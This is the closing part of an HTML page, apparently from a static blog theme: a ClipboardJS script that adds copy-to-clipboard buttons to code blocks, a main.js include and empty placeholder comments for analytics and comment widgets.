    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
